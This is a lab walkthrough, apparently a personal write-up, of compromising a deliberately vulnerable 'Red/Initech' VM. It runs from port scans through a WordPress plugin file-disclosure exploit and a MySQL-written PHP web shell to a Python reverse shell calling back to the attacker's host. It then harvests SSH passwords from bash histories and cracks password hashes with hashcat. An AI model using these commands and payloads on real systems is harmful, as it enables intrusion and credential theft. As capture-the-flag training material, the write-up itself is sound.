Find target:
root@kali:~# nmap 172.16.219.0/24
Starting Nmap 7.31 ( https://nmap.org ) at 2018-01-25 09:26 PST
Nmap scan report for 172.16.219.178
Host is up (0.00051s latency).
Not shown: 992 filtered ports
PORT STATE SERVICE
20/tcp closed ftp-data
21/tcp open ftp
22/tcp open ssh
53/tcp open domain
80/tcp open http
139/tcp open netbios-ssn
666/tcp open doom
3306/tcp open mysql
MAC Address: 00:0C:29:5C:A2:AF (VMware)
Nmap done: 256 IP addresses (5 hosts up) scanned in 205.65 seconds
Scan the target:
root@kali:~# nmap -T4 -A -p- 172.16.219.178
Starting Nmap 7.31 ( https://nmap.org ) at 2018-01-25 11:14 PST
Nmap scan report for 172.16.219.178
Host is up (0.0014s latency).
Not shown: 65523 filtered ports
PORT STATE SERVICE VERSION
20/tcp closed ftp-data
21/tcp open ftp vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: Can't parse PASV response: "Permission denied."
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 81:21:ce:a1:1a:05:b1:69:4f:4d:ed:80:28:e8:99:05 (RSA)
|_ 256 5b:a5:bb:67:91:1a:51:c2:d3:21:da:c0:ca:f0:db:9e (ECDSA)
53/tcp open domain dnsmasq 2.75
| dns-nsid:
|_ bind.version: dnsmasq-2.75
80/tcp open http
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
123/tcp closed ntp
137/tcp closed netbios-ns
138/tcp closed netbios-dgm
139/tcp open netbios-ssn Samba smbd 4.3.9-Ubuntu (workgroup: WORKGROUP)
666/tcp open doom?
3306/tcp open mysql MySQL 5.7.12-0ubuntu1
| mysql-info:
| Protocol: 10
| Version: 5.7.12-0ubuntu1
| Thread ID: 13
| Capabilities flags: 63487
| Some Capabilities: ODBCClient, Speaks41ProtocolOld, FoundRows, IgnoreSpaceBeforeParenthesis, SupportsLoadDataLocal, ConnectWithDatabase, DontAllowDatabaseTableColumn, LongPassword, IgnoreSigpipes, Speaks41ProtocolNew, SupportsCompression, InteractiveClient, LongColumnFlag, Support41Auth, SupportsTransactions, SupportsMultipleResults, SupportsMultipleStatments, SupportsAuthPlugins
| Status: Autocommit
| Salt: Q\x08W%#oqB%J\x0F\x11 \x16,W\x1Fxad\x00
|_ Auth Plugin Name: 88
12380/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Tim, we need to-do better next year for Initech
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
... ...
Host script results:
|_clock-skew: mean: 24s, deviation: 0s, median: 24s
|_nbstat: NetBIOS name: RED, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.9-Ubuntu)
| Computer name: red
| NetBIOS computer name: RED
| Domain name:
| FQDN: red
|_ System time: 2018-01-25T19:16:19+00:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smbv2-enabled: Server supports SMBv2 protocol
Post-scan script results:
| clock-skew:
|_ 24s: Majority of systems scanned
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 137.25 seconds
Scan web. http://172.16.219.178 returned not found. dirb and nikto scan on that only found two files: .bashrc and .profile. Noted that 12380 port is open and runs Apache httpd service. So let's try dirb and nikto scan on 172.16.219.178:12380.
root@kali:~# dirb http://172.16.219.178:12380
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Thu Jan 25 11:26:54 2018
URL_BASE: http://172.16.219.178:12380/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://172.16.219.178:12380/ ----
-----------------
END_TIME: Thu Jan 25 11:27:45 2018
DOWNLOADED: 4612 - FOUND: 0
root@kali:~# nikto -host 172.16.219.178:12380
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 172.16.219.178
+ Target Hostname: 172.16.219.178
+ Target Port: 12380
---------------------------------------------------------------------------
+ SSL Info: Subject: /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/[email protected]
Ciphers: ECDHE-RSA-AES256-GCM-SHA384
Issuer: /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/[email protected]
+ Start Time: 2018-01-25 11:28:21 (GMT-8)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0x15 0x5347c53a972d1
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'dave' found, with contents: Soemthing doesn't look right here
+ The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry '/admin112233/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/blogblog/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 2 entries which should be manually viewed.
+ Hostname '172.16.219.178' does not match certificate's names: Red.Initech
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ Uncommon header 'x-ob_mode' found, with contents: 1
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ 7690 requests: 0 error(s) and 14 item(s) reported on remote host
+ End Time: 2018-01-25 11:30:10 (GMT-8) (109 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Found two entries: '/admin112233/' and '/blogblog/'.
Browse to https://172.16.219.178:12380/blogblog and read the blogs. Note the WEEK1 blog:
I'm not familiar with WordPress plugins, after googled a little bit, 
So let's navigate to https://172.16.219.178:12380/blogblog/wp-content/
Inside the plugins folder, there're some plugins.
In kali linux, you can use the searchsploit command to search the exploit databse.
root@kali:~# searchsploit advanced video
--------------------------------------------- ----------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/platforms)
--------------------------------------------- ----------------------------------
WordPress Plugin Advanced Video 1.0 - Local | ./php/webapps/39646.py
--------------------------------------------- ----------------------------------
Edit the script, add library and updated the url:
import ssl
ssl._create_default_https_context = ssl._create_unverified_context
url = "https://172.16.219.178:12380/blogblog" # insert url to wordpress
Run the script in your local terminal and then navigate to uploads folder at https://172.16.219.178:12380/blogblog/wp-content/uploads/. Notice there's a picture. Download this picture and cat the content locally:
root@kali:~/Downloads# cat ../Desktop/1568214632.jpeg
<?php
/**
* The base configurations of the WordPress.
*
* This file has the following configurations: MySQL settings, Table Prefix,
* Secret Keys, and ABSPATH. You can find more information by visiting
* {@link https://codex.wordpress.org/Editing_wp-config.php Editing wp-config.php}
* Codex page. You can get the MySQL settings from your web host.
*
* This file is used by the wp-config.php creation script during the
* installation. You don't have to use the web site, you can just copy this file
* to "wp-config.php" and fill in the values.
*
* @package WordPress
*/
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');
/** MySQL database username */
define('DB_USER', 'root');
/** MySQL database password */
define('DB_PASSWORD', 'plbkac');
/** MySQL hostname */
define('DB_HOST', 'localhost');
/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8mb4');
/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');
/**#@+
* Authentication Unique Keys and Salts.
*
* Change these to different unique phrases!
* You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
* You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
*
* @since 2.6.0
*/
define('AUTH_KEY', 'V 5p=[.Vds8~SX;>t)++Tt57U6{Xe`T|oW^eQ!mHr }]>9RX07W<sZ,I~`6Y5-T:');
define('SECURE_AUTH_KEY', 'vJZq=p.Ug,]:<-P#A|k-+:;JzV8*pZ|K/U*J][Nyvs+}&!/#>4#K7eFP5-av`n)2');
define('LOGGED_IN_KEY', 'ql-Vfg[?v6{ZR*+O)|Hf OpPWYfKX0Jmpl8zU<cr.wm?|jqZH:YMv;zu@tM7P:4o');
define('NONCE_KEY', 'j|V8J.~n}R2,mlU%?C8o2[~6Vo1{Gt+4mykbYH;HDAIj9TE?QQI!VW]]D`3i73xO');
define('AUTH_SALT', 'I{gDlDs`Z@.+/AdyzYw4%+<WsO-LDBHT}>}!||Xrf@1E6jJNV={p1?yMKYec*OI$');
define('SECURE_AUTH_SALT', '.HJmx^zb];5P}hM-uJ%^+9=0SBQEh[[*>#z+p>nVi10`XOUq (Zml~op3SG4OG_D');
define('LOGGED_IN_SALT', '[Zz!)%R7/w37+:9L#.=hL:cyeMM2kTx&_nP4{D}n=y=FQt%zJw>c[a+;ppCzIkt;');
define('NONCE_SALT', 'tb(}BfgB7l!rhDVm{eK6^MSN-|o]S]]axl4TE_y+Fi5I-RxN/9xeTsK]#ga_9:hJ');
/**#@-*/
/**
* WordPress Database Table prefix.
*
* You can have multiple installations in one database if you give each a unique
* prefix. Only numbers, letters, and underscores please!
*/
$table_prefix = 'wp_';
/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*/
define('WP_DEBUG', false);
/* That's all, stop editing! Happy blogging. */
/** Absolute path to the WordPress directory. */
if ( !defined('ABSPATH') )
define('ABSPATH', dirname(__FILE__) . '/');
/** Sets up WordPress vars and included files. */
require_once(ABSPATH . 'wp-settings.php');
define('WP_HTTP_BLOCK_EXTERNAL', true);
Yeahhhh!! We have table name, username, and password! Connect to the remote mysql server:
root@kali:~/Desktop# mysql -h 172.16.219.178 -u root -p wordpress
Enter password:
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 44
Server version: 5.7.12-0ubuntu1 (Ubuntu)
Copyright (c) 2000, 2016, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> select database();
+------------+
| database() |
+------------+
| wordpress |
+------------+
1 row in set (0.00 sec)
mysql> select table_name from information_schema.tables where table_schema='wordpress';
+-----------------------+
| table_name |
+-----------------------+
| wp_commentmeta |
| wp_comments |
| wp_links |
| wp_options |
| wp_postmeta |
| wp_posts |
| wp_term_relationships |
| wp_term_taxonomy |
| wp_terms |
| wp_usermeta |
| wp_users |
+-----------------------+
11 rows in set (0.00 sec)
mysql> select column_name from information_schema.columns where table_schema='wordpress' and table_name='wp_users';
+---------------------+
| column_name |
+---------------------+
| ID |
| user_login |
| user_pass |
| user_nicename |
| user_email |
| user_url |
| user_registered |
| user_activation_key |
| user_status |
| display_name |
+---------------------+
10 rows in set (0.00 sec)
mysql> select "<?php echo shell_exec($_GET['cmd']);?>" into outfile "/var/www/html/blogblog/wp-content/uploads/sh.php";
ERROR 1 (HY000): Can't create/write to file '/var/www/html/blogblog/wp-content/uploads/sh.php' (Errcode: 2 - No such file or directory)
mysql> select "<?php echo shell_exec($_GET['cmd']);?>" into outfile "/var/www/https/blogblog/wp-content/uploads/sh.php";
Query OK, 1 row affected (0.00 sec)
mysql>
Now use a reverse shell to establish tcp connection. I used the Python reverse shell listed in this page: https://highon.coffee/blog/reverse-shell-cheat-sheet/
Inside kali run nc -lvp 80 and in browser navigate to:
https://172.16.219.178:12380/blogblog/wp-content/uploads/sh.php?cmd=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("myKali-IP",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Now we have the shell.
root@kali:# nc -lvp 80
listening on [any] 80 ...
172.16.219.178: inverse host lookup failed: Unknown host
connect to [172.16.219.177] from (UNKNOWN) [172.16.219.178] 46008
/bin/sh: 0: can't access tty; job control turned off
$ ls
1568214632.jpeg
228062103.jpeg
560193514.jpeg
651071434.jpeg
679463507.jpeg
85777840.jpeg
exp.php
exp2.php
exp3.php
sh.php
shell.php
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Tried spawning a tty shell but nothing happened.(Spawning a TTY Shell) Let's see users in the system to see if we can find useful info.
$ ls /home
ls /home
AParnell Drew JBare LSolum2 RNunemaker Sam jess www
CCeaser ETollefson JKanode MBassin SHAY Taylor kai zoe
CJoo Eeth JLipps MFrei SHayslett elly mel
DSwanger IChadwick LSolum NATHAN SStroud jamie peter
$ ls -al AParnell
ls -al AParnell
total 24
drwxr-xr-x 2 AParnell AParnell 4096 Jun 5 2016 .
drwxr-xr-x 32 root root 4096 Jun 4 2016 ..
-rw-r--r-- 1 root root 5 Jun 5 2016 .bash_history
-rw-r--r-- 1 AParnell AParnell 220 Sep 1 2015 .bash_logout
-rw-r--r-- 1 AParnell AParnell 3771 Sep 1 2015 .bashrc
-rw-r--r-- 1 AParnell AParnell 675 Sep 1 2015 .profile
$ cat AParnell/.bash_history
cat AParnell/.bash_history
exit
... ...
$ cat JKanode/.bash_history
cat JKanode/.bash_history
id
whoami
ls -lah
pwd
ps aux
sshpass -p thisimypassword ssh JKanode@localhost
apt-get install sshpass
sshpass -p JZQuyIN5 peter@localhost
ps -ef
top
kill -9 3747
exit
$
After looking into each user's directory, I found JKanode's and peter's ssh pass!
Check peter's home directory:
$ ls -la peter
ls -la peter
total 72
drwxr-xr-x 3 peter peter 4096 Jun 3 2016 .
drwxr-xr-x 32 root root 4096 Jun 4 2016 ..
-rw------- 1 peter peter 1 Jun 5 2016 .bash_history
-rw-r--r-- 1 peter peter 220 Jun 3 2016 .bash_logout
-rw-r--r-- 1 peter peter 3771 Jun 3 2016 .bashrc
drwx------ 2 peter peter 4096 Jun 6 2016 .cache
-rw-r--r-- 1 peter peter 675 Jun 3 2016 .profile
-rw-r--r-- 1 peter peter 0 Jun 3 2016 .sudo_as_admin_successful
-rw------- 1 peter peter 577 Jun 3 2016 .viminfo
-rw-rw-r-- 1 peter peter 39206 Jun 3 2016 .zcompdump
$
It seems like peter's home directory is more interesting. So I'll try to ssh via peter's creds.
Alternatively, after got the sql creds, I tried to crack the user_pass.
mysql> select user_pass from wp_users into outfile "/var/www/https/blogblog/wp-content/uploads/pass.txt";
Query OK, 16 rows affected (0.00 sec)
mysql>
Put the hashes into one file and use hashcat to crack them, got the following result:
root@kali:~/Downloads# hashcat -m 400 h.txt /usr/share/wordlists/rockyou.txt --force
hashcat (pull/1273/head) starting...
OpenCL Platform #1: The pocl project
... ...
$P$BzjfKAHd6N4cHKiugLX.4aLes8PxnZ1:football
$P$BFmSPiDX1fChKRsytp1yp8Jo7RdHeI1:cookie
$P$BqV.SQ6OtKhVV7k7h1wqESkMh41buR0:monkey
$P$BZlxAMnC6ON.PYaurLGrhfBi6TjtcA0:coolgirl
Use the pass and corresponding username to authenticate to https://172.16.219.178:12380/blogblog/wp-admin/
Then upload the shell to hack.